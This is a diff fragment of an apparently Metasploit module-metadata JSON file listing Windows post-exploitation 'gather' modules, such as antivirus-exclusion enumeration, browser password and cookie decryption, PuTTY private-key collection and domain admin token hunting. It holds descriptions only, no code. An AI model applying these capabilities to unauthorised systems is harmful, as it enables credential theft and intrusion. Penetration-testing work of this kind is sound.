"author": [ + "Andrew Smith", + "Jon Hart " + ], + "description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_av_excluded.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_av_excluded", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_browsers": { + "name": "Advanced Browser Data Extraction for Chromium and Gecko Browsers", + "fullname": "post/windows/gather/enum_browsers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alexander \"xaitax\" Hagenah" + ], + "description": "This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers\n on the target system. 
It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI)\n and can extract additional data such as browsing history, keyword search history, download history, autofill data,\n credit card information, browser cache and installed extensions.", + "references": [], + "platform": "Windows", + "arch": "x64, x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-30 15:43:02 +0000", + "path": "/modules/post/windows/gather/enum_browsers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_browsers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_chocolatey_applications": { + "name": "Windows Gather Installed Application Within Chocolatey Enumeration", + "fullname": "post/windows/gather/enum_chocolatey_applications", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nick Cottrell " + ], + "description": "This module will enumerate all installed applications on a Windows system with chocolatey installed", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-04-01 10:56:11 +0000", + "path": "/modules/post/windows/gather/enum_chocolatey_applications.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_chocolatey_applications", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + 
}, + "post_windows/gather/enum_chrome": { + "name": "Windows Gather Google Chrome User Data Enumeration", + "fullname": "post/windows/gather/enum_chrome", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sven Taute", + "sinn3r ", + "Kx499", + "mubix " + ], + "description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_chrome.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_chrome", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_computers": { + "name": "Windows Gather Enumerate Computers", + "fullname": "post/windows/gather/enum_computers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module will enumerate computers included in the primary Active Directory domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-10-12 10:59:29 +0000", + "path": "/modules/post/windows/gather/enum_computers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_computers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_windows/gather/enum_db": { + "name": "Windows Gather Database Instance Enumeration", + "fullname": "post/windows/gather/enum_db", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Barry Shteiman ", + "juan vazquez " + ], + "description": "This module will enumerate a Windows system for installed database instances.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_db.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_db", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_devices": { + "name": "Windows Gather Hardware Enumeration", + "fullname": "post/windows/gather/enum_devices", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon Perry " + ], + "description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. 
It is recommended to run this module as a\n background job.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_devices.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_devices", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_dirperms": { + "name": "Windows Gather Directory Permissions Enumeration", + "fullname": "post/windows/gather/enum_dirperms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499", + "Ben Campbell ", + "sinn3r " + ], + "description": "This module enumerates directories and lists the permissions set\n on found directories. 
Please note: if the PATH option isn't specified,\n then the module will start enumerate whatever is in the target machine's\n %PATH% variable.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_dirperms.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_dirperms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain": { + "name": "Windows Gather Enumerate Domain", + "fullname": "post/windows/gather/enum_domain", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module identifies the primary Active Directory domain name\n and domain controller.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-08 13:35:22 +0000", + "path": "/modules/post/windows/gather/enum_domain.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain_group_users": { + "name": "Windows Gather Enumerate Domain Group", + "fullname": "post/windows/gather/enum_domain_group_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Stephen Haywood " + ], + 
"description": "This module extracts user accounts from the specified domain group\n and stores the results in the loot. It will also verify if session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module must be\n run on a session running as a domain user.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-22 17:05:19 +0000", + "path": "/modules/post/windows/gather/enum_domain_group_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_group_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domain_tokens": { + "name": "Windows Gather Enumerate Domain Tokens", + "fullname": "post/windows/gather/enum_domain_tokens", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module enumerates domain account tokens, processes running under\n domain accounts, and domain users in the local Administrators, Users\n and Backup Operator groups.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-10 13:54:39 +0000", + "path": "/modules/post/windows/gather/enum_domain_tokens.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_tokens", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_windows/gather/enum_domain_users": { + "name": "Windows Gather Enumerate Active Domain Users", + "fullname": "post/windows/gather/enum_domain_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Etienne Stalmans ", + "Ben Campbell " + ], + "description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.'", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_domain_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domain_users", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_domains": { + "name": "Windows Gather Domain Enumeration", + "fullname": "post/windows/gather/enum_domains", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module enumerates currently the domains a host can see and the domain\n controllers for each domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_domains.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_domains", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { 
+ "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_emet": { + "name": "Windows Gather EMET Protected Paths", + "fullname": "post/windows/gather/enum_emet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vysec " + ], + "description": "This module will enumerate the EMET protected paths on the target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_emet.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_emet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_files": { + "name": "Windows Gather Generic File Collection", + "fullname": "post/windows/gather/enum_files", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "3vi1john ", + "RageLtMan " + ], + "description": "This module downloads files recursively based on the FILE_GLOBS option.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_files.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_files", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + 
"actions": [] + }, + "post_windows/gather/enum_hostfile": { + "name": "Windows Gather Windows Host File Enumeration", + "fullname": "post/windows/gather/enum_hostfile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module returns a list of entries in the target system's hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_hostfile.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_hostfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_hyperv_vms": { + "name": "Windows Hyper-V VM Enumeration", + "fullname": "post/windows/gather/enum_hyperv_vms", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "gwillcox-r7" + ], + "description": "This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all\n of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/post/windows/gather/enum_hyperv_vms.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_hyperv_vms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + 
"needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ie": { + "name": "Windows Gather Internet Explorer User Data Enumeration", + "fullname": "post/windows/gather/enum_ie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kx499" + ], + "description": "This module will collect history, cookies, and credentials (from either HTTP\n auth passwords, or saved form passwords found in auto-complete) in\n Internet Explorer. The ability to gather credentials is only supported\n for versions of IE >=7, while history and cookies can be extracted for all\n versions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ie.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_logged_on_users": { + "name": "Windows Gather Logged On User Enumeration (Registry)", + "fullname": "post/windows/gather/enum_logged_on_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate current and recently logged on Windows users.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-08 01:50:36 +0000", + "path": "/modules/post/windows/gather/enum_logged_on_users.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_logged_on_users", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "powershell", + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ms_product_keys": { + "name": "Windows Gather Product Key", + "fullname": "post/windows/gather/enum_ms_product_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon Perry " + ], + "description": "This module will enumerate Microsoft product license keys.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-21 16:00:27 +0000", + "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ms_product_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_muicache": { + "name": "Windows Gather Enum User MUICache", + "fullname": "post/windows/gather/enum_muicache", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "TJ Glad " + ], + "description": "This module gathers information about the files and file paths that logged on users have\n executed on the system. It also will check if the file still exists on the system. This\n information is gathered by using information stored under the MUICache registry key. If\n the user is logged in when the module is executed it will collect the MUICache entries\n by accessing the registry directly. 
If the user is not logged in the module will download\n users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are\n parsed from the downloaded hive.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_muicache.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_muicache", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_onedrive": { + "name": "OneDrive Sync Provider Enumeration Module", + "fullname": "post/windows/gather/enum_onedrive", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will identify the Office 365 OneDrive endpoints for both business and personal accounts\n across all users (providing access is permitted). 
It is useful for identifying document libraries\n that may otherwise not be obvious which could contain sensitive or useful information.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/enum_onedrive.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_onedrive", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_patches": { + "name": "Windows Gather Applied Patches", + "fullname": "post/windows/gather/enum_patches", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "zeroSteiner ", + "mubix " + ], + "description": "This module enumerates patches applied to a Windows system using the\n WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/post/windows/gather/enum_patches.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_patches", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_powershell_env": { + "name": "Windows Gather PowerShell Environment Setting Enumeration", + "fullname": "post/windows/gather/enum_powershell_env", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate Microsoft PowerShell settings.", + "references": [ + "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies", + "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-08-01 00:56:21 +0000", + "path": "/modules/post/windows/gather/enum_powershell_env.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_powershell_env", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_prefetch": { + "name": "Windows Gather Prefetch File Information", + "fullname": "post/windows/gather/enum_prefetch", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "TJ Glad " + ], + "description": "This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems\n and current values of related registry keys. 
From each prefetch file we'll collect\n filetime (converted to utc) of the last execution, file path hash, run count, filename\n and the execution path.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_prefetch.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_prefetch", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_proxy": { + "name": "Windows Gather Proxy Setting", + "fullname": "post/windows/gather/enum_proxy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module pulls a user's proxy settings. 
If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n for the specified SID and target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-12-04 15:10:47 +0000", + "path": "/modules/post/windows/gather/enum_proxy.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_proxy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_putty_saved_sessions": { + "name": "PuTTY Saved Sessions Enumeration Module", + "fullname": "post/windows/gather/enum_putty_saved_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. 
These will be connections that\n the user has previously after accepting the host SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_putty_saved_sessions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_services": { + "name": "Windows Gather Service Info Enumeration", + "fullname": "post/windows/gather/enum_services", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Keith Faber", + "Kx499" + ], + "description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. 
NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-09 17:27:19 +0000", + "path": "/modules/post/windows/gather/enum_services.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_services", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_shares": { + "name": "Windows Gather SMB Share Enumeration via Registry", + "fullname": "post/windows/gather/enum_shares", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate configured and recently used file shares.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-02 17:34:32 +0000", + "path": "/modules/post/windows/gather/enum_shares.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_shares", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_snmp": { + "name": "Windows Gather SNMP Settings", + "fullname": "post/windows/gather/enum_snmp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Tebo " + ], + "description": "This module will 
enumerate the SNMP service configuration.", + "references": [ + "MSB-MS00-096", + "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-13 17:45:10 +0000", + "path": "/modules/post/windows/gather/enum_snmp.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_snmp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_termserv": { + "name": "Windows Gather Terminal Server Client Connection Information Dumper", + "fullname": "post/windows/gather/enum_termserv", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module dumps MRU and connection data for RDP sessions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_termserv.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_termserv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_tokens": { + "name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)", + "fullname": "post/windows/gather/enum_tokens", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": 
"This module enumerates Domain Admin account processes and delegation tokens.\n\n This module will first check if the session has sufficient privileges\n to replace process level tokens and adjust process quotas.\n\n The SeAssignPrimaryTokenPrivilege privilege will not be assigned if\n the session has been elevated to SYSTEM. In that case try first\n migrating to another process that is running as SYSTEM.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_tokens.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_tokens", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_tomcat": { + "name": "Windows Gather Apache Tomcat Enumeration", + "fullname": "post/windows/gather/enum_tomcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Barry Shteiman " + ], + "description": "This module will collect information from a Windows-based Apache Tomcat. 
